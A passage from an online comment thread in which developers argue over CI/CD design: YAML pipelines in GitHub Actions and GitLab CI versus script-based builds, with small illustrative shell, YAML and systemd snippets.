Consequently, I think a possible escape path - albeit an expensive one - would be for a "next gen" CI system to expose those _task primitives_ via an API that is easy to write SDKs for. Read: not a grpc API. From there, YAML could be ditched as "actual code" would manipulate the CI primitives during build.
I know this isn't a definite answer to your question, but it was still super interesting to me and hopefully it will inspire someone else to dig into finding the actual answer
The best guess I have as far as CI/CD specifically appears to be <https://en.wikipedia.org/wiki/Travis_CI#:~:text=travis%20ci%...> which launched in 2011 offering free CI and I found a reference to their .travis.yml in GitLab's repo in 2011, too
- CruiseControl (2004) was "ant as a service," so it was XML https://web.archive.org/web/20040812214609/http://confluence...
- Hudson (2007) https://web.archive.org/web/20140701020639/https://www.java.... was also XML, and was by that point driving Maven 2 builds (also XML)
- I was shocked that GitHub existed in 2008 https://web.archive.org/web/20081230235955/http://github.com... with an especial nod to "no longer a pain in the ass" and "Not only is Git the new hotness, it's a fast, efficient, distributed version control system ideal for the collaborative development of software" but this was just a "for funsies" link since they were very, very late to the CI/CD game
- I was surprised that k8s 1.0.0 still had references to .json PodSpec files in 2015 https://github.com/kubernetes/kubernetes/blob/v1.0.0/example...
- cloud-init had yaml in 2010 https://github.com/openstack-archive/cloud-init/blob/0.7.0/d... so that's a plausible "it started here" since they were yaml declarations of steps to perform upon machine boot (and still, unquestionably, my favorite user-init thing)
- just for giggles, GitLab 1.0.2 (2011) didn't even have CI/CD https://gitlab.com/gitlab-org/gitlab/-/tree/v1.0.2 -- however, while digging into that I found .travis.yml in v2.0.0 (also 2011) so that's a very plausible citation <https://gitlab.com/gitlab-org/gitlab/-/blob/v2.0.0/.travis.y...>
- Ansible 1.0 in 2012 was also "execution in yaml" https://github.com/ansible/ansible/blob/v1.0/examples/playbo...
I've been using YAML for ages and I never had any issue with it. What do you think is wrong with YAML?
Many of us would rather use a less terrible programming language instead.
Some people talk about YAML being a turing complete language, if people try to do that in your CI/CD system just fire them
I'll allow helm style templating but that's about it.
It's miles better than Jenkins and the horrors people created there. GitLab CI can at least be easily migrated to any other GitLab instance and stuff should Just Work because it is in the end not much more than self contained bash scripts, but Jenkins... is a clown show, especially for Ops people of larger instances. On one side, you got 50 plugins with CVEs but you can't update them because you need to find a slot that works for all development teams to have a week or two to fix their pipelines again, and on the other side you got a Jenkins instance for each project which lessens the coordination effort but you gotta worry about dozens of Jenkins instances. Oh and that doesn't include the fact many old pipelines aren't written in Groovy or, in fact, in any code at all but only in Jenkins's UI...
Github Actions however, I'd say for someone coming from GitLab, is even worse to work with than Jenkins.
Instead of wrapping the aws cli command I wrote small Go applications using the AWS SDK for Go.
Removed the headaches when passing in complex params and parsing output, and also made the logic portable as we need to do the builds on different platforms (Windows, Linux and macOS).
I have seen people doing absolutely insane setups because they thought they have to do it in yaml and pipeline and there is absolutely no other option or it is somehow wrong to drop some stuff to code.
I'm not sure I understood what you're saying because it sounds too absurd to be real. The whole point of a CICD pipeline is that it automates all aspects of your CICD needs. All mainstream CICD systems support this as their happy path. You specify build stages and build jobs, you manage your build artifacts, you setup how things are tested, deployed and/or delivered.
That's their happy path.
And you're calling the most basic use cases of a standard class of tools "insanity"?
Please help me understand what point you are trying to make.
All aspects of your CICD pipeline - rebasing PRs is not a 'basic CICD' need.
CICD pipeline should take a commit state and produce artifacts from that state, not lint and not autofix trivial issues.
Everything that is not "take code state - run tests - build - deploy (eventualy fail)" is insanity.
Autofixing/linting for example should be a separate process way before CICD starts. And people do stuff like that because they think it is part of integration and testing. Trying to shove it inside is insanity.
This is the dumbest thing I see installers do a lot lately.
It tends to be that folks want to shoehorn some technology into the pipeline that doesn't really fit, or they make these giant one shot configurations instead of running multiple small parallel jobs by setting up different configurations for different concerns etc.
It's really easy to extend and compose jobs, so it's simple to unit test your pipeline: https://gitlab.com/nunet/test-suite/-/tree/main/cicd/tests?r...
This way I can code my pipeline and use the same infrastructure to isolate groups of jobs that compose a relevant functionality and test it in isolation to the rest of the pipeline.
I just wish components didn't have such a rigid opinion on folder structure, because they are really powerful, but you have to adopt gitlab prescription
I maintained a Javascript project that used Make and it just turned into a mess. We simply changed all of our `make some-job` jobs into `./scripts/some-job.sh` and not only was the code much nicer, less experienced developers were suddenly more comfortable making changes to scripts. We didn't really need Make to figure out when to rebuild anything, all of our tools already had caching.
The main argument I wanted to make is that it works very well to just use GitHub actions to execute your tool of choice.
It allows you to define a central interface into your project (largely what I find people justify using Make for), but smoothes out so many of the weird little bumps you run into from "using Make wrong."
Plus, you can at any point just drop into running a script in a different language as your command, so it basically "supports bash scripts" too.
https://github.com/casey/just
So if even remotely possible we write all CI as a single 'one-click' script which can do it all by itself. Makes developing/testing the whole CI easy. Makes changing between CI implementations easy. Can solve really nasty issues (think: CI is down, need to send update to customer) easily because if you want a release you just build it locally.
The only thing it won't automatically do out of the box is be fast, because obviously this script also needs to set up most of the build environment. So depending on the exact implementation there's variation in the split between what constitutes setting up a build environment and running the CI script. As in: for some tools our CI scripts will do 'everything', starting from a minimal OS install, whereas others expect an OS with build tools and possibly some dependencies already available.
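A hedged sketch of such a 'one-click' entry point; the stage commands are placeholders for real setup/build/test logic:

```shell
set -eu

# Run one named stage; any failing command aborts the whole script.
stage() {
  name="$1"; shift
  echo "==> $name"
  "$@"
}

stage setup   echo "installing build dependencies"
stage build   echo "compiling"
stage test    echo "running tests"
stage package echo "creating release artifact"
```

Because it is a plain script, a developer runs the exact same file locally that the CI runner executes, which is the whole point.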
https://www.joelonsoftware.com/2000/08/09/the-joel-test-12-s...
Yes, a thousand times.
Deploy scripts are tougher to deal with, as they'll naturally rely on a flurry of environment variables, protected credentials etc.
But for everything else, writing the script for local execution first, and generalizing it for CI once it runs well enough, is the absolute best approach. It doesn't even need to run in the local shell; having all the CI stuff in a dedicated docker image is fine if it requires specific libraries or env.
- Treat pipelines as code.
- Make pipeline parts composable, as code.
- Be mindful of vendor lock-in and/or lack of portability (it is a trade-off).
For on-premise: if you're already deeply invested in running your own infrastructure, that seems like a good fit.
When thinking about how we build Namespace -- there are parts that are so important that we just build and run internally; and there are others where we find that the products in the market just bring a tremendous amount of value beyond self-hosting (Honeycomb is a prime example).
Use the tools that work best for you.
I fully agree with the recommendation to use maintainable code. But that effectively rules out shell scripts in my opinion. CI shell scripts tend to become a big ball of mud rather quickly as you run into the limitations of bash. I think most devs only have superficial knowledge of shell scripts, so do yourself a favor and skip them and go straight to whatever language your team is comfortable with.
One can learn to use it to the point where it's usable to do advanced automation... but why, when there are so many better options available?
The second one has been, from someone else: if you can use anything else than bash, do that.
Jokes aside... it's so trendy to bash bash that it's not funny anymore. Bash is still quite reliable for work that usually gets done in CI, and nearly maintenance free if used well.
THIS 10000% percent.
My personal favourite solution is Bazel specifically because it can be so isolated from those layers.
No need for Docker (or Docker in Docker as many of these solutions end up requiring) or other exotic stuff, can produce OCI image artifacts with `rules_oci` directly.
By requiring so little of the runner you really don't care for runner features, you can then restrict your CI/CD runner selection to just reliability, cost, performance and ease of integration.
That's also a very valid takeaway for life in general
- I would go even further: Do not use bash/python or any duck-typed lang. (only for simple projects, but better just don't get started).
- Leverage Nix (!! no its not a joke ecosystem) : devshells or/and build devcontainers out of it.
- Treat tooling code, ci code, the exact same as your other code.
- Maybe generate the pipeline for your YAML based CI system in code.
- If you use a CI system, gitlab, circle etc, use one which does not do stupid things with your containers (like Github: 4 years! old f** up: https://github.com/actions/runner/issues/863#issuecomment-25...). Also one which lets you run dynamically generated pipelines.
That's why we built our own build tool which does that, or at least helps us do the above things:
https://github.com/sdsc-ordes/quitsh
Each systemd service could represent a step built by running a script, and each service can say what it depends on, thus helping parallelize any step that can be.
I have not found anyone trying that so far. Is anybody aware of something similar and more POSIX/cross platform that allows writing a DAG of scripts to execute?
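For what it's worth, the systemd version of the idea might look like this hypothetical unit - `After`/`Requires` encode the DAG edges, and systemd runs in parallel anything with no ordering between them:

```ini
# build-frontend.service (hypothetical CI step as a oneshot unit)
[Unit]
Description=Build frontend bundle
Requires=fetch-deps.service
After=fetch-deps.service

[Service]
Type=oneshot
ExecStart=/ci/scripts/build-frontend.sh
RemainAfterExit=yes
```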
Doesn’t matter Jenkins or actions - it is just complicated. Making it simpler is on devs/ops not the tool.
Facts.
However I’ll go a step further and say “only implement your logic in a tool that has a debugger”.
YAML is the worst. But shell scripts are second worst. Use a real language.
That said, if you absolutely need to use shell script for reasons, keep it all in a single script, define logging functions including debug logs, rigorously check every constraint and variable, use shellcheck, factor the code well into functions - I should write a blog post about it sometime.
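A small sketch of those practices - strict mode, logging helpers with a debug level, and failing fast on unset inputs (all names are illustrative):

```shell
set -eu

log()   { printf '%s\n' "$*" >&2; }
debug() { [ "${DEBUG:-0}" = "1" ] && log "DEBUG: $*" || true; }
die()   { log "ERROR: $*"; exit 1; }

# Fail fast if the named variable is unset or empty.
require() {
  eval "_v=\${$1:-}"
  [ -n "$_v" ] || die "required variable \$$1 is not set"
}

BUILD_TARGET="${BUILD_TARGET:-all}"
require BUILD_TARGET
log "building target: $BUILD_TARGET"
```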
Unfortunately, this isn't a good plan going forward... :( Going forward I'd wish for a tool that's as ubiquitous as Git, has good integration with editors like language servers, and can be sold as a service or run completely in-house. It would allow defining the actions of the automated builds and tests, have a way of dealing with releases, expose an interface for collecting statistics, integrate with bug tracking software for the purpose of excluding/including tests in test runs, and allow organizing tests into groups (e.g. sanity / nightly / rc).
The problem is that tools today don't come anywhere close to being what I want for CI; neither free nor commercial tools are even going in the desired direction. So, the best option is simply to minimize their use.
- mise for lang config
- direnv for environment loading
- op for secret injection
- justfile for lint, build, etc
Here's a template repo that I've been working on that has all of this implemented:
https://github.com/iloveitaly/python-starter-template
It's more complex than I would like it to be, but it's consistent and avoids having to deal with GHA too much.
I've also found having a GHA playground is helpful:
https://github.com/iloveitaly/github-action-playground
Why does YAML have any traction when JSON is right there? I'm an idiot amateur and even I learned this lesson; my 1 MB YAML file full of data took 15 seconds to parse each time. I quickly learned to use JSON instead, takes half a second.
Because it has comments, which are utterly essential for anything used as a human readable/writable configuration file format (your use case, with 1 MB of data, needs a data interchange format, for which yes JSON is at least much better than YAML).
YAML has comments. YAML is easily & trivially written by humans. JSON is easily & trivially written by code.
My lesson learned here? When generating YAML, instead generate JSON. If it's meant to be read and updated by humans, use something that can communicate to the humans (comments). And don't use YAML as a data interchange format.
For short configs, YAML is acceptable-ish. For anything longer I'd take TOML or something else.
However, CI is not "configured", it is coded, and YAML is simply the wrong tool for that. It was continuously extended to deal with it, so it developed into much more than just "markup", but it grew into this terrible chimera. Once you start using advanced features in GitLab's YAML like anchors and references to avoid writing the same stuff again and again, you'll notice that the whole tooling around YAML is simply not there. What does the resulting YAML look like? How do you run this stuff locally? How do you debug this? Just don't go there.
You will not be able to avoid YAML completely, obviously, but use it the way it was originally intended to.
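For concreteness, this is the kind of anchor/merge-key reuse being warned about - a plausible GitLab CI fragment, not from any real project:

```yaml
.defaults: &defaults
  image: alpine:3.19
  before_script:
    - apk add --no-cache make

build:
  <<: *defaults
  script:
    - make build

test:
  <<: *defaults
  script:
    - make test
```

It deduplicates nicely, but nothing in the surrounding tooling shows you the expanded result or lets you step through it, which is exactly the complaint.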
Finally! I was always struggling to explain to others why YAML is OK-ish as a language, but then never seems to work well for the things people tried doing with it. Especially stuff that needs to run commands, such as CI.
> How does the resulting YAML look like? How do you run this stuff locally? How do you debug this? Just don't go there.
Agreed. GitHub actions, or any remote CI runner for that matter, makes the problem even worse. The whole cycle of having to push CI code, wait 10 minutes while praying for it to work, still getting an error, trying to figure out the mistake, fixing one subtle syntax error, then pushing the code again in the hope that that works is just a terrible workflow. Massive waste of time.
> You will not be able to avoid YAML completely, obviously, but use it the way it was originally intended to.
Even for configurations YAML remains a pain, unfortunately. It could have been great for configs, but in my experience the whole strict whitespace (tabs-vs-spaces) part ruined it. It isn't a problem when you work from an IDE that protects you from accidentally using tabs (also, auto-formatting for the win!) but when you have to write YAML configuration (for example: Netplan) on a remote server using just an editor it quickly becomes a game of whack-a-mole.
I don't understand what problem you could possibly be experiencing. What exactly do you find hard about running commands in, say, GitLab CICD?
iterating a GitHub Actions workflow is a gigantic pain in the ass. Capturing all of the important logic in a script/makefile/whatever means I can iterate it locally way faster and then all I need github to do is provision an environment and call my scripts in the order I require.
What's wrong with this?
https://docs.github.com/en/actions/writing-workflows/choosin...
What exactly do you find hard in writing your own scripts with a scripting language? Surely you are not a software developer who feels conditionals and variable substitutions are hard.
> it ends up being 20 steps in a language that isn't shell but is calling shell over and over again, and can't be run outside of CI.
Why are you writing your CICD scripts in a way that you cannot run them outside of a CICD pipeline? I mean, you're writing them yourself, aren't you? Why are you failing to meet your own requirements?
If you have a requirement to run your own scripts outside of a pipeline, how come you're not writing them like that? It's CICD 101 that those scripts should be runnable outside of the pipeline. From your description, you're failing to even follow the most basic recommendations and best practices. Why?
That doesn't sound like a YAML problem, does it?
In order to use this domain-specific language properly, you first must learn it, and learning YAML is but a small part of that. Moreover, it is not immediately obvious that, once you know it, you actually want to avoid it. But you can't avoid it entirely, because it is the core language of the CI/CD platform. And you can't know how to avoid it effectively until you have spent some time just using it directly. Simplicity comes from tearing away what is unnecessary, but to discern necessary from unnecessary requires judgment gained by experience. There is no world in which this knowledge transfers immediately, frictionlessly, and losslessly.
Furthermore, there is a lot that GitHub (replace with platform of choice) could have done to make this better. They largely have no incentive to do so, because platform lock-in isn't a bad thing to the platform owner, and it's a nontrivial amount of work on their part, just as it is a nontrivial amount of work on your part to learn and use their platform in a way that doesn't lock you into it.
A: Easy! You just spin up a Kubernetes pod with Alpine image, map a couple of files inside, run a bash script of "date" with some parameters, redirect output to a mapped file, and then read the resulting file. That's all. Here's a YAML for you. Configuration, baby!
(based on actual events)
(Iterating even on this stuff by waiting for the runner is still annoying though. You need to commit to the repo, push, and wait. Hence the suggestion of having scripts that you can also run locally, so you can test changes locally when you're iterating on them. This isn't any kind of guarantee, but it's far less annoying to do (say) 15 iterations locally followed by the inevitable extra 3 remotely than it is having to do all 18 remotely, waiting for the runner each time then debugging it by staring at the output logs. Even assuming you'd be able to get away with as few as 15 given that you don't have proper access to the machine.)
Where?
https://docs.github.com/en/actions/writing-workflows/choosin...
> don't have anything particularly interesting in the .yml file, just the bare minimum plus some small number of uncomplicated script invocations to install dependencies and actually do the build
It is a very basic "how to" with no recommendations.
Moreover, they directly illustrate a bad practice:
> This is not running two scripts, this is running a shell command that invokes two scripts, and has no error handling if the first one fails. If that's the behavior you want, fine, but then put it in one shell script, not two. What am I supposed to do with this locally? If the first shell script fails, do I need to fix it, or do I just proceed on to the second one?

This is invoking a shell, and that's how shells typically work: one command at a time. Would it make you feel better if they added && or used a separate step, like they also recommend, to split these out? You can put the error handling in your script if need be; that's on you or the reader. Most CI agents only understand true/false, or in this case $?.
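For the record, both behaviors are straightforward to spell out; a sketch using the script names from the quoted example (and, if I remember the defaults right, GitHub's bash invocation for `run` steps already passes `-e`):

```yaml
# make a two-script step stop on the first failure explicitly:
- run: |
    ./script1.sh
    ./script2.sh
  shell: bash -e {0}

# or split them into separate steps, so a failure in the first skips the second:
- run: ./script1.sh
- run: ./script2.sh
```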
Nobody said they want that behavior, they're showing you the behavior. They actually show you the best-practice behavior first; not sure if you didn't read that or are purposely omitting it. In fact, the portion you highlight is talking about permissions, not making suggestions.
That page is just one small part of a much larger reference document, and it doesn't seem opinionated at all to me. Plus there are dozens of other examples elsewhere in the same reference that are not simple invocations of one shell script and nowhere are you admonished not to do things that way.
No, it really isn't. I'll clarify why.
Pretty much all pipeline services share the same architecture pattern:
* A pipeline run consists of one or more build jobs,
* Pipeline runs are triggered by external events,
* Build jobs have contexts and can output artifacts,
* Build jobs are grouped into stages,
* Stages are organized as a directed graph,
* Transitions between stages in the directed graph are governed by a set of rules, some supported by default (e.g., if a job fails then the stage fails), complemented by custom rules (manual or automatic approvals, API tests, baking periods, etc).
This is the textbook scenario for DSLs. You are already bound to an architecture pattern, thus there is no point in reinventing the wheel each time. Just specify your stages and which jobs run as part of each stage, manage artifacts and promotion logic, and you're done.
You do not need to take my word for it. Take a look at GitLab CICD for a pipeline with build, test, and delivery stages. See what a mess you would end up with if you supported the same feature set in whatever scripting language you choose. There is no discussion or debate.
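For illustration, a sketch of such a three-stage pipeline in GitLab's DSL (job names, scripts, and paths are placeholders):

```yaml
stages: [build, test, deliver]

build-job:
  stage: build
  script: ./scripts/build.sh
  artifacts:
    paths: [dist/]

test-job:
  stage: test
  script: ./scripts/test.sh

deliver-job:
  stage: deliver
  script: ./scripts/deliver.sh
  when: manual   # promotion gate
```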
The problem starts when that graph cannot be determined in advance and needs to be computed at runtime. It's a bit better when it's possible to compute that graph as a first step, and a lot worse when one needs to run a couple of stages before being able to compute the next elements of the graph. The graph computation is terrible enough in e.g. Groovy, but having to do it in YAML is absolutely horrendous.
> Take a look at GitLab CICD for a pipeline with build, test, and delivery stage
Yeah, if your workflow fits in a kindergarten example of "build, test, and delivery", then yeah, it's YAML all the way baby. Not everyone is so fortunate.
Wrapping it in a DSL encoded as YAML has zero benefit other than it being easier for a team with weak design skills to implement and harder for users to migrate off of.
Pardon my pedantry, but the meaning of YAML's name was changed from the original “Yet Another Markup Language” to “YAML Ain't Markup Language” in a 2002 draft spec because YAML is, in fact, not a markup language :)
Compare:
https://yaml.org/spec/history/2001-12-10.html
https://yaml.org/spec/history/2002-04-07.html
Brings to mind the classic "Kingdom of Nouns" [0] parable, which I read to my kid just last week. The multi-line "run" nodes in GitHub actions give me the heebie-jeebies, like how MUMPS data validation was maintained in metadata of VA-Fileman [1].
0. https://steve-yegge.blogspot.com/2006/03/execution-in-kingdo...
1. https://www.hardhats.org/fileman/pm/gfs_frm.htm
I will take the Actions path 100% of the time. Building your own action is so insanely simple it makes me wonder if the people complaining about YAML understand the tooling because it's entirely avoidable. It also coincides with top comments about coding your own CI, if you're just "using" YAML you're barely touching the surface.
* Very easy to write the code you didn't mean to, especially in the context of CI where potentially a lot of languages are going to be mixed, a lot of quoting and escaping. YAML's string literals are a nightmare.
* YAML has no way to express inheritance. Nor does it have a good way to express variables. Both are usually desperately needed in CI scripts, and are usually bolted on top with some extra-language syntax (all those dollars in GitHub actions, Helm charts, Ansible playbooks etc.)
* Complexity skyrockets compared to the size of the file. E.g., in a language like C you can write a manageable program with millions of lines of code. In YAML you will give up after a few tens of thousands of lines (similar to SQL or any other language that doesn't have modules).
* Whitespace errors are very hard to spot and fix. Often whitespace errors in YAML result in valid YAML which, however, doesn't do what you want...
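To illustrate the last point: both documents below are valid YAML, but a single indentation level decides what `env` attaches to (keys are GitHub-Actions-style placeholders):

```yaml
# env indented under the step applies to that step only:
steps:
  - run: make test
    env:
      DEBUG: "1"
---
# one dedent later, env is a sibling of steps: still valid YAML,
# silently a different meaning
steps:
  - run: make test
env:
  DEBUG: "1"
```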
2. Trying to encode logic and control flow in a YAML document is much more difficult than writing that flow in a "real" programming language. Debugging is especially much easier in "real" languages.
YAML is great for the happy-flow where everything works. It's absolutely terrible for any other flow.
MSBuild, for example, is all XML, but it has debugging support in Visual Studio complete with breakpoints and expression evaluation.
It's a DSL. There is no execution, only configuration. The only thing that's executed are the custom scripts you create yourself, and any intro tutorial on the subject will eventually teach you that if you want to run anything beyond a single straightforward command, you should move those instructions to a shell script to make them testable and reproducible.
Things are so simple and straightforward that you need to go way out of your way to create your own problems.
I wonder how many people in this discussion are blaming the tools when they even bothered to learn the very basics.
> It's a DSL. There is no execution, only configuration.
Jenkins pipelines are also DSL. I still can print out debugging information from them. "It's a DSL" is not an excuse for being a special case of shitty DSL.
> any intro tutorial on the subject will eventually teach you
Do these tutorials have a chapter on what to do when you join a company with 500 engineers and a ton of YAMLs that are not written in that way?
> you should move those instructions to a shell script to make them testable
Yeah, no. How am I supposed to test my script that is supposed to run on Github-supplied runner with a ton of injected secrets and Github-supplied JSON of 10,000 lines, when I don’t have the runner, the secrets, or the JSON?
The YAML is fed into an agent which reads it to decide what to execute. Any time you change the control flow of a system by changing data, you are doing a form of programming.
For example: Stripe uses constants for types of tax registration numbers (VAT/GST/TIN, etc.). So there is EU_VAT for European VAT numbers, US_TIN for US tax identification numbers, etc. But what value to use for tax-exempt organisations that don't have a tax number? Well... guess how I found out about NO_VAT...
On the bright side, I did learn that way that although Norway is in the Schengen zone, apparently they are not part of the EU (hence the separation of EU_VAT and NO_VAT). I guess the 'no' name collision has taught many developers something about Norway :-)
It would be better to delete your comment so nobody else ever has to have this crisis.
Why? I understand it in cases where security is critical or intellectual property is at stake. Are you talking about "snowflake runners" or just dumb executors of container images?
With self hosted Gitlab runners it was almost as fast as doing incremental builds. When your build process can take like 15-20 minutes (medium sized C++ code base), this brought down the total time to 30 seconds or so.
Imagine building Android - even "cloning the sources" is 200GB of data transfer, build times are in hours. Not having to delete the previous sources and doing an incremental build saves a lot of everything.
tldr; "A cache is one or more files a job downloads and saves. Subsequent jobs that use the same cache don’t have to download the files again, so they execute more quickly."
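For reference, a sketch of what that looks like in `.gitlab-ci.yml` (job name and paths are placeholders):

```yaml
build:
  script: ./build.sh
  cache:
    key: "$CI_COMMIT_REF_SLUG"   # one cache per branch
    paths:
      - .cache/
      - node_modules/
```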
It will probably still be slower than a dedicated runner, but possibly require less maintenance ("pet" runner vs "cattle" runner).
Security is another thing where this can come in handy, but properly firewalling CI runners and having mirrors of all your dependencies is a lot of work and might very well be overkill for most people.
Buy a cheap Ryzen, and put it on your desk, that's a cheap runner.
So many times I was biting my fingers not being able to figure out the problems GitHub runners were having with my actions and was unable to investigate.
This so much. This ties into the previous point about using as much shell as possible. Additionally I'd say environment control via Docker/Nix, as well as modularizing the pipeline so you can restart it just before the point of failure instead of rerunning the whole business just to replay one little failure.
To put the first 3 points into different words: you should treat the CI only as a tool that manages the interface and provides interaction with the outside world (including injecting secrets/configuration, setting triggers, storing caches etc.) and helps to visualize things.
Unfortunately, to do that, it puts constraints on how you can use it. Apart from that, no logic should live in the CI.
To an extent, yes. There should be one command to build, one to run tests, etc.
But in many cases, you do actually want the pipeline functionality that something like Gitlab CI offers - having multiple jobs instead of a single one has many benefits (better/shorter retry behaviour, parallelisation, manual triggers, caching, reacting to specific repository hooks, running subsets of tests depending on the changed files, secrets in env vars, artifact publishing, etc.). It's at this point that it becomes almost unavoidable to use many of the configuration features including branching statements, job dependencies etc. and that's where it gets messy.
The problem is really that you're forced to do all of that in YAML instead of an actual programming language.
Although we’re using temporal to schedule the workflows, we have a full-code typescript CI/CD setup.
We’ve been through them all starting with Jenkins ending with drone, until we realized that full-code makes it so much easier to maintain and share the work over the whole dev org.
No more yaml, code generating yaml, product quirk, groovy or DSLs!
This has been my entire strategy since I've been able to do this:
https://learn.microsoft.com/en-us/dotnet/core/deploying/#pub...
Pulling the latest from git, running "dotnet build" and sending the artifacts to zip/S3 is now much easier than setting up and managing Jenkins, et. al. You also get the benefit of having 100% of your CI/CD pipeline under source control alongside the product.
In my last professional application of this (B2B/SaaS; customer hosts on-prem), we didn't even have to write the deployment piece. All we needed to do was email the S3 zip link to the customer and they learned a quick procedure to extract it on the server each time.
My concern with this kind of deployment solution, where the customer is instructed to install software from links received in e-mails, is that someone else could very easily send them a link to a malicious installer and they would be hosed. E-mail is not authenticated (usually) and the sender can be forged.
I suppose you could use a shared OneDrive folder or something, which would be safer, as long as the customer doesn't rely on receiving the link to OneDrive by e-mail.
Docker and to some extent, however unwieldy, Kubernetes at least allow you to run anywhere, anytime without locking you into a third party.
A "pipeline language" that can run anywhere, even locally, sets up dependency services and initial data, runs tests and avoids YAML overload would be a much needed addition to software engineering.
Do not recommend this approach (of using docker for building).
It's very satisfying to just compile an application with a super esoteric toolchain in Docker vs the nightmares of setting it up locally (and keeping it working over time).
We used a single huge docker image with all the dependencies we needed to cross compile to all architectures. The image was around 1GB, it did its job but it was super slow on CI to pull it.
Let me at least recommend depot.dev for having absurdly fast runners.
I shared more context in this thread: https://x.com/solomonstre/status/1895671390176747682
https://github.com/vlang/v/blob/master/ci/linux_ci.vsh
* Consider whether it's not easier to do away with CI in the cloud and just build locally on the dev's laptop
With fast laptops and Docker you can get perfectly reproducible builds and tests locally that are infinitely easier to debug. It works for us.
I think builds must be possible locally, but i’d never rely on devs for the source of truth artifacts running in production, past a super early startup.
as always, enough decoupling is useful
> as long as it is proper, maintainable code
...in an imperative language you know well and which has a sufficient amount of type/null checking you can tolerate.
Also lol @deng
Are the Actions a little cumbersome to set up and test? Sure. Is it a little annoying to have to make somewhat-useless commits just to re-trigger an Action to see if it works? Absolutely. But once it works, I just set it and forget it. I've barely touched my workflows in ~4 years, outside of the Node version updates.
Otherwise, I'm very pleased with both. My needs must just be simple enough to not run into these more complicated issues, I guess?
GitHub CI is designed in a way which tends to work well for
- languages with no or very very cheap "compilation" steps (i.e. basically only scripting languages)
- relatively well contained project (e.g. one JS library, no mono repo stuff)
- no complex needs for integration tests
- no need for compliance enforcement stuff, especially not if it has to actually be securely enforced instead of just making it easier to comply than not to comply
- all developers having roughly the same permissions (ignore that some admin has more)
- fast CI
But the moment you step away from this, it falls apart more and more, and every company I have seen so far which doesn't fit the constraints above has non-stop issues with GitHub Actions.
But the worst part, which maybe is where a lot of the hatred comes from, is that it's there cheap, maybe even free (if you pay for GitHub anyway), and it doesn't need an additional contract, billing, etc. No additional vetting of third-party companies. No managing your own CI service, etc. So while it causes issues non-stop, it also initially seems the "cheaper" solution for the company. And then when your company realizes it's not, and has to set up its own GitHub runners etc., it probably isn't. But that is if you properly account for dev time spent on "fixing CI issues", and even then there is the sunk-cost fallacy, because you have already spent so much time making GitHub Actions work and you would have to port everything over, etc. Also, realistically speaking, a lot of other CI solutions are only marginally better.
I find github actions works very well for compliance. The ability to create attestations makes it easy to enforce policies about artifact provenance and integrity and was much easier to get working properly compared to my experience attempting to get jenkins to produce attestations.
https://docs.github.com/en/actions/security-for-github-actio...
https://docs.github.com/en/actions/security-for-github-actio...
What was your issue with it?
This is not true at all. It's fine with Haskell, just cache the dependencies to speed up the build...
- GitHub Action cache and build artifact handling is a complete shit show (slow upload, slow download and a lot of practical subtle annoyances, finished off with sub-par integration in existing build systems)
- GitHub runners are comparatively small, so e.g. larger linker steps can already lead to pretty bad performance penalties
and sure like I said, if you project is small it doesn't matter
Or even if you pay $$$ for big runners you can roll it onto your Azure bill rather than having to justify another SAAS service.
This is the key point. Every CI system falls apart when you get too far from the happy path that you lay out above. I don't know if there's an answer besides giving up on CI all together.
The problem isn't GitHub Actions but people overloading their build and CI system with all sorts of custom crap. You'd have a hard time doing the same thing twenty years ago with Ant and Hudson (what Jenkins was called before the fork, after Oracle inherited it from Sun). And for the same reason. These systems simply aren't very good as a bash replacement.
If you don't know what Ant is: that was a popular build system for Java, before people moved the problem to Maven and then to Gradle (without solving it). I've dealt with Maven files that were trying to do all sorts of complicated things via plugins that would have amounted to two or three lines of bash. Gradle isn't any better. Ant at least used to have simple primitives for "doing" things. But you had to spell it out in XML form.
The point of all this, is that build & CI systems should mainly do simple things like building software. They shouldn't have a lot of conditional logic, custom side effects, and wonky things that may or may not happen depending on the alignment of the moon and stars. Debugging that stuff when it fails to work really sucks.
What helps with Yaml is using Yaml generators. I've used a Kotlin one for a while. Basically, you get auto complete, syntactical sanity, type checking and if it compiles it runs. Also makes it a lot easier to discover new parameters, plugin version updates, etc.
That's supposedly CICD 101. I don't understand why people in this thread seem to be missing this basic fact and instead they vent about irrelevant things like YAML.
You set your pipeline. You provide your own scripts. If a GitHub Action saves you time, you adopt it instead of reinventing the wheel. That's it.
This whole discussion reads like the bike fall meme.
For you to make that comment, I'm not sure you ever went through any basic intro to GitHub Actions tutorial.
GitHub Actions has 'run'.
https://docs.github.com/en/actions/writing-workflows/workflo...
Now that we established that, GitHub Actions also supports custom actions, which is a way to create, share, and reuse high-level actions. Instead of copy-pasting stuff around, you do the equivalent of importing a third party module.
https://docs.github.com/en/actions/sharing-automations/creat...
Onboarding a custom GitHub Action does not prevent you from using steps.run.
I don't even know where to start regarding your comment on expression evaluation and conditions. Have you used a CICD system before?
The problem with half the comments in this thread railing against CICD in general, YAML, etc. is that they clearly do not have the faintest idea about what they are doing, and are instead complaining about their own inability.
I'm an experienced SaltStack user. If I found something I need is too complex to be described in YAML, I'll just write a custom module and/or state. Use YAML just to inform Salt what should happen, and shove the logic in the Python files.
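A sketch of that split (the `mycompany.deployed` state is hypothetical, implemented in a Python file under `_states/`): the YAML stays purely declarative:

```yaml
# deploy.sls -- the YAML only says *what* should happen;
# the *how* lives in the custom Python state module
deploy_app:
  mycompany.deployed:
    - name: myapp
    - version: "1.2.3"
```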
People really should become generalists if they handle the plumbing.
I am with the author - we can do better than the status quo!
I commit code, push it, wait 45 seconds, it syncs to AWS, then all my sites periodically ping the S3 bucket for any changes, and download any new items. It's one of the most reliable pieces of my entire stack. It's comically consistent, compared to anything I try building for a mobile app or pushing to a mobile app store.
I look forward to opening my IDE to push code to the Actions for my web app, and I dread the build pipeline for a mobile app.
Well yeah because nobody is saying it isn't reliable. It's the setup stage that is painful. Once you've done it you can just leave it mostly.
I guess if your CI is very simple and always the same you are exposed to these issues less.
I would recommend looking at Fastlane[0] if you haven't already.
[0] https://github.com/fastlane/fastlane
You notice a deprecation warning in the logs, or an email from GitHub and you make a 1 line commit to bump the node version. Easy.
Sure you can make typos that you don’t spot until you’ve pushed and the action doesn’t run, but I quickly learned to stop being lazy and actually think about what I’m writing, and get someone else to do an actual review (not just scroll down and up and give it a LGTM).
My experience is same as the commenter above, it’s relatively set and forget. A few minutes setup work for hours and hours of benefit over years of builds.
It's how it works now. It doesn't have to forever. We can imagine a future in which it works in a better way. One that isn't so annoying.
> I don't think there's some universally perfect solution that magically just works all the time and never needs intervention or updating.
Again you seem to be confused as to what the issue is. Maintenance is not painful. Initial development is.
